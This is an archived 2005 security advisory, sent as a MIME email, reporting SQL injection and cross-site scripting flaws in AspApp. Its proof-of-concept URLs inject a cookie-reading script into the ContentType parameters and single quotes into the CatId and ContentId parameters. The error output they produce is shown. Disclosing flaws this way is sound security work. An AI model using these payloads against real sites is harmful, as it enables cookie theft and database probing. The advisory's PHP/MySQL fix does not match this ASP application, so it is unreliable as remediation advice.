AspApp.txt

2005-03-29T00:00:00
ID PACKETSTORM:36847
Type packetstorm
Reporter Diabolic Crab
Modified 2005-03-29T00:00:00

Description

                                        
                                            `This is a multi-part message in MIME format.  
  
------=_NextPart_000_0055_01C53454.CDDA4C20  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Dcrab 's Security Advisory  
http://icis.digitalparadox.org/~dcrab  
http://www.hackerscenter.com/  
  
Severity: Medium  
Title: Multiple sql injection, and xss vulnerabilities in AspApp.  
Date: March 30, 2005  
Vendor: AspApp  
Vendor site: http://www.localhost  
  
Summary:  
There are multiple sql injection, xss vulnerabilities in the AspApp.  
  
Proof of Concept Exploits:  
  
http://localhost/content.asp?CatId=3D109&ContentType=3D%22%3E%3Cscript%3E=  
alert(document.cookie)%3C/script%3E  
Pops cookie  
  
http://localhost/content.asp?CatId=3D'SQL_ERROR&ContentType=3DCompany  
Sql error  
Microsoft VBScript runtime error '800a000d'  
  
Type mismatch: 'cLng'  
  
C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, line  
341  
  
  
http://localhost/content.asp?ContentId=3D'SQL_ERROR  
Sql error  
Microsoft VBScript runtime error '800a000d'  
  
Type mismatch: 'cLng'  
  
C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, line  
341  
  
  
http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealert(docume=  
nt.cookie)%3C/script%3E  
Pops cookie  
  
Possible fix: The usage of htmlspeacialchars(), mysql_escape_string(), =  
mysql_real_escape_string() and other functions for input validation =  
before passing user input to the mysql database, or before echoing data =  
on the screen, would solve these problems.  
  
Author:  
These vulnerabilties have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free to =  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://icis.digitalparadox.org/~dcrab. =  
Lookout for my soon to come out book on Secure coding with php.  
  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com  
  
iQA/AwUBQkjyNiZV5e8av/DUEQKRLwCgpmrJ/ocvgm71sGxdIbAeOSeetRYAoOVm  
/jk6eYh8KsXpcrRKoGioBL3w  
=3D2em+  
-----END PGP SIGNATURE-----  
  
------=_NextPart_000_0055_01C53454.CDDA4C20  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff>  
<DIV><FONT face=3DArial size=3D2>-----BEGIN PGP SIGNED =  
MESSAGE-----<BR>Hash:=20  
SHA1</FONT></DIV>  
<DIV> </DIV>  
<DIV><FONT face=3DArial size=3D2>Dcrab 's Security Advisory<BR><A=20  
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=  
.org/~dcrab</A><BR><A=20  
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=  
/FONT></DIV>  
<DIV> </DIV>  
<DIV><FONT face=3DArial size=3D2>Severity:  Medium<BR>Title: =  
Multiple sql=20  
injection, and xss vulnerabilities in AspApp.<BR>Date: March  =  
30, =20  
2005<BR>Vendor: AspApp<BR>Vendor site: <A=20  
href=3D"http://www.localhost">http://www.localhost</A></FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV><FONT face=3DArial size=3D2>Summary:<BR>There are multiple sql =  
injection, xss=20  
vulnerabilities in the AspApp.</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV><FONT face=3DArial size=3D2>Proof of Concept Exploits:</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV><FONT face=3DArial size=3D2><A=20  
href=3D"http://localhost/content.asp?CatId=3D109&ContentType=3D%22%3E=  
%3Cscript%3Ealert(document.cookie)%3C/script%3E">http://localhost/content=  
.asp?CatId=3D109&ContentType=3D%22%3E%3Cscript%3Ealert(document.cooki=  
e)%3C/script%3E</A><BR>Pops=20  
cookie</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV><FONT face=3DArial size=3D2><A=20  
href=3D"http://localhost/content.asp?CatId=3D'SQL_ERROR&ContentType=3D=  
Company">http://localhost/content.asp?CatId=3D'SQL_ERROR&ContentType=3D=  
Company</A><BR>Sql=20  
error</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2>Microsoft VBScript runtime  error=20  
'800a000d'</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV><FONT face=3DArial size=3D2>Type mismatch: 'cLng'</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>  
<DIV><FONT face=3DArial=20  
size=3D2>C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp, =  
  
line<BR>341</FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV><FONT face=3DArial =  
size=3D2>  
<DIV><BR><A=20  
href=3D"http://localhost/content.asp?ContentId=3D'SQL_ERROR">http://local=  
host/content.asp?ContentId=3D'SQL_ERROR</A><BR>Sql=20  
error<BR>Microsoft VBScript runtime  error '800a000d'</DIV>  
<DIV> </DIV>  
<DIV>Type mismatch: 'cLng'</DIV>  
<DIV> </DIV>  
<DIV>C:\Webspace\resadmin\webadmin\localhost\www/common/i_utils.asp,=20  
line<BR>341</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/content.asp?contenttype=3D%22%3E%3Cscript%3Ealer=  
t(document.cookie)%3C/script%3E">http://localhost/content.asp?contenttype=  
=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</A><BR>Pops=20  
cookie</DIV>  
<DIV> </DIV>  
<DIV>Possible fix: The usage of =  
htmlspeacialchars(), mysql_escape_string(),=20  
mysql_real_escape_string() and other functions for input validation =  
before=20  
passing user input to the mysql database, or before echoing data on =  
the=20  
screen, would solve these problems.</DIV>  
<DIV> </DIV>  
<DIV>Author:<BR>These vulnerabilties have been found and released by =  
Diabolic=20  
Crab, Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel =  
free=20  
to contact me regarding these vulnerabilities. You can find me at, =  
<A=20  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =  
or <A=20  
href=3D"http://icis.digitalparadox.org/~dcrab">http://icis.digitalparadox=  
.org/~dcrab</A>.=20  
Lookout for my soon to come out book on Secure coding with php.</DIV>  
<DIV> </DIV>  
<DIV>-----BEGIN PGP SIGNATURE-----<BR>Version: PGP 8.1 - not licensed =  
for=20  
commercial use: <A href=3D"http://www.pgp.com">www.pgp.com</A></DIV>  
<DIV> </DIV>  
<DIV>iQA/AwUBQkjyNiZV5e8av/DUEQKRLwCgpmrJ/ocvgm71sGxdIbAeOSeetRYAoOVm<BR>=  
/jk6eYh8KsXpcrRKoGioBL3w<BR>=3D2em+<BR>-----END=20  
PGP SIGNATURE-----<BR></FONT></DIV></BODY></HTML>  
  
------=_NextPart_000_0055_01C53454.CDDA4C20--  
`